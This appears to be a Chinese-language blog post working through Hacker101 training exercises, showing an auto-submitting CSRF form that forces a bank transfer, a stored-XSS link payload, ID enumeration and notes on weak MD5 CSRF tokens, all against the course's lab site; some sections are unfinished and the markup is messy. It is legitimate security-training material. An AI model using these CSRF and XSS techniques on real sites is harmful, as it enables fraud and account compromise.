Jason Sheh

Hacker101 课程作业(一)


0xff 简介
国外知名漏洞平台HackerOne刚刚上线了一个在线web安全学习网站hacker101,课程比较基础,内容很全面。当然,我感兴趣的还是最后的9个课程作业 :)

0x00 Level 0: Breakerbank
In this exercise, you’re presented with a bank account interface. There are many instances of the bugs we’ve discussed so far, along with some that we haven’t yet talked about.
Hint: A logic flaw in the application will give you a sample report for one of the bugs, giving you a nice template to work from.

先看一下源码,提示了我们共有4个漏洞
In this level, there are 4 vulnerabilities, falling into the following classes:
CSRF
Reflected XSS
Authorization Bypass/Direct Object Reference
Have fun!

  • CSRF

  • 转账操作直接由html中的post请求提交,可以在本地构造请求

    <body onload="javascript:csrf()"></body>
    <script type="text/javascript">
    function csrf(){
    document.getElementById("button").click();
    }
    </script>
    <form action="https://levels-a.hacker101.com/levels/0/" method="POST">
    <input type="input" name="from" value="1">
    <input type="input" name="to" value="588">
    <input type="input" name="amount" value="1000000">
    <input id="button" type="submit" value="Transfer" >
    </form>
    
    <li>权限绕过</li>
    

    表单中自己创建一个from字段,就可以自定义转账的发起人

    和CSRF结合起来的效果

  • 反射型XSS

  • 0x01 Level 1: Breakbook
    In this exercise, you’re presented with a simple social network. There are many instances of the bugs we’ve discussed so far, along with some that we haven’t yet talked about.
    Hint: Pay attention to the first message posted.
    去发现社交网络里的漏洞吧

    还是先看源码,还是四个漏洞
    In this level, there are 4 vulnerabilities, falling into the following classes:
    CSRF
    Stored XSS
    Forced Browsing
    Have fun!

  • 存储型XSS

  • 第一眼看上去就知道肯定会在输入框那里,不过又给出了说明html不被允许,但链接可以点击
    通过构造一个网址,会自动生成相应的标签,可以注入XSS>标签,可以注入XSS

    <tr>
        <td><img src="/favicon.png" width="64" height="64"></td>
        <td>qq3039344</td>
        <td><a href="http://test.com/"/onmouseover="alert(1)">http://test.com/"/onmouseover="alert(1)</a></td>
        <td><a href="post?id=247">Permalink</a></td>
    </tr>
    

  • 枚举

  • 自己的留言链接为
    https://levels-a.hacker101.com/levels/1/post?id=247
    通过改变id的值可以看到别人的留言

  • CSRF

  • 我在做这一题时感觉有一点小问题,此题中有csrf token应该不存在csrf漏洞,但是生成token的算法过于简单—MD5(),可以轻松构造token所以依然存在csrf。不过,不管我把token换成谁的,只要是32位hash都显示是我自己发的,其他的则显示bad token无法发送。

    此处存疑,不知道是题目出错了,还是我思路有问题。

    0x02 Level 2: Breaker Profile

    In this exercise, you’re presented with a profile management and viewing interface. There are many instances of the bugs we’ve discussed so far, along with some that we haven’t yet talked about.
    Hint: Think about what we learned about special handling with respect to XSS.

    档案管理
    有整整七个漏洞In this level, there are 7 vulnerabilities, falling into the following classes:
    Stored XSS
    Reflected XSS
    Unrelated Bonus
    Have fun!

  • XSS-1

  • 头像处,加上.jpg后缀绕过图片检测

  • XSS-2

  • 字体颜色处,随意修改

  • XSS-3-反射型

    崩溃了…哪来7个漏洞,还有那什么Unrelated Bonus是什么意思??? :(